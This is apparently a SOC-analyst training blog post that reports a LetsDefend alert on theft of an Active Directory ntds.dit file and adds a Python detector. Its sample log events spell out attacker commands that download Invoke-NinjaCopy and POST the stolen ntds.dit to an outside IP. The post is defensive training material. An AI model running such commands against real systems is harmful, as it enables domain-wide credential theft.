Day 116 of Becoming a SOC Analyst — SOC314 Unauthorized Access to NTDS.dit File Detected (True Positive)
The attacker at 185.107.56.72 RDP'd directly into the dual-NIC EC2 instance "Paul" via its exposed AWS-facing NIC (172.31.30.36), bypassing internal perimeter controls entirely. Invoke-NinjaCopy.ps1 was downloaded to C:\temp and used to copy ntds.dit through raw NTFS volume access, deliberately avoiding the Windows file API hooks, before exfiltration via a PowerShell Invoke-WebRequest POST to 185.107.56.72:8000/upload. Combined with the SYSTEM hive, the stolen ntds.dit enables full offline domain credential extraction. The exfiltration was allowed at execution time; the endpoint was subsequently isolated.
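As an added example (not from the post or from LetsDefend), here is a small Python correlator that hunts for the chain above in constructed PowerShell script-block (Event ID 4104) and logon (Event ID 4624, logon type 10 = RDP) records; the event layout and field names are assumptions, not any particular SIEM's schema.

```python
import re
from collections import defaultdict

# Constructed sample events (simplified, normalised): a Windows 4624 logon with
# logon_type 10 (RemoteInteractive / RDP) and PowerShell 4104 script-block text.
SAMPLE_EVENTS = [
    {"host": "Paul", "event_id": 4624, "logon_type": 10, "src_ip": "185.107.56.72"},
    {"host": "Paul", "event_id": 4104, "script": "iwr http://185.107.56.72:8000/Invoke-NinjaCopy.ps1 -OutFile C:\\temp\\Invoke-NinjaCopy.ps1"},
    {"host": "Paul", "event_id": 4104, "script": "Invoke-NinjaCopy -Path C:\\Windows\\NTDS\\ntds.dit"},
    {"host": "Paul", "event_id": 4104, "script": "Invoke-WebRequest -Uri http://185.107.56.72:8000/upload -Method POST -InFile C:\\temp\\ntds.dit"},
    {"host": "Workstation7", "event_id": 4104, "script": "Get-ChildItem C:\\temp"},
]

# Each stage of the chain described in the post, as a pattern over script-block text.
STAGES = {
    "ninjacopy_tool": re.compile(r"invoke-ninjacopy", re.I),
    "ntds_access": re.compile(r"ntds\.dit", re.I),
    "http_post_upload": re.compile(r"(invoke-webrequest|\biwr\b).*-method\s+post", re.I),
}
URL_HOST = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")


def detect_ntds_theft(events):
    """Return the hosts on which every stage fired; severity is raised to
    'critical' when the HTTP POST destination equals an RDP logon source IP."""
    hosts = defaultdict(lambda: {"rdp_sources": set(), "stages": set(), "exfil_hosts": set()})
    for ev in events:
        rec = hosts[ev["host"]]
        if ev["event_id"] == 4624 and ev.get("logon_type") == 10:
            rec["rdp_sources"].add(ev["src_ip"])
        elif ev["event_id"] == 4104:
            for name, pattern in STAGES.items():
                if pattern.search(ev["script"]):
                    rec["stages"].add(name)
            if STAGES["http_post_upload"].search(ev["script"]):
                m = URL_HOST.search(ev["script"])
                if m:
                    rec["exfil_hosts"].add(m.group(1))
    findings = {}
    for host, rec in hosts.items():
        if rec["stages"] >= set(STAGES):  # all three stages seen on this host
            same_actor = bool(rec["rdp_sources"] & rec["exfil_hosts"])
            findings[host] = {
                "severity": "critical" if same_actor else "high",
                "rdp_sources": sorted(rec["rdp_sources"]),
                "exfil_hosts": sorted(rec["exfil_hosts"]),
            }
    return findings
```

Run over the sample set it flags only "Paul" as critical, because the POST destination is the same address that performed the RDP logon; a host missing any stage is not reported.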
🔬 Analysis Reports
🦠 VirusTotal (NinjaCopy) → https://www.virustotal.com/gui/url/de...
🔍 AbuseIPDB (185.107.56.72) → https://www.abuseipdb.com/check/185.1...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #NTDSdit #NinjaCopy #CredentialDumping #ActiveDirectory #RDP #IncidentResponse #SIEM #Day116 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity